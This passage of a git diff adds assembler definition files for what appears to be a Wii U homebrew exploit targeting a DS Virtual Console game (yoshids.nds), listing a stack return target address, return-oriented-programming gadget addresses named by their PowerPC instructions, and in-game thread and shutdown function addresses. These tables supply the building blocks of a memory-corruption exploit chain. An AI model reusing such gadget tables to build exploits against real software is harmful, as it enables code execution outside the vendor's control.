+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DC0)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205788C)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018990)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x021492A4)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240EC)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x022219E8)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E04)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x02221894)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB1C)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220D4C)
+_START_EXIT equ (RPX_OFFSET + 0x0202693C)
diff --git a/yoshids_defs.s b/yoshids_defs.s
new file mode 100644
index 0000000..a563db0
--- /dev/null
+++ b/yoshids_defs.s
@@ -0,0 +1,41 @@
+
+FILE_NDS_NAME equ "yoshids.nds"
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x1079B52C)
+
+HACHI_APPLICATION_PTR equ (0x10C91938)
+
+ARM9_ROM_LOCATION equ (0x16444200)
+ARM7_ROM_MEM2_START equ (0xEBBBBE00)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02206F7C)
+BCTRL equ (RPX_OFFSET + 0x02206EB4)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3508)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A3134)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001068)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179060)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277A3C)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018910)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AE948)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4B0)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DBC)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02057874)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018998)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0214919C)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240F4)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x022218E0)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221CFC)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x0222178C)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CD0)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB24)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220C44)
+_START_EXIT equ (RPX_OFFSET + 0x02026944)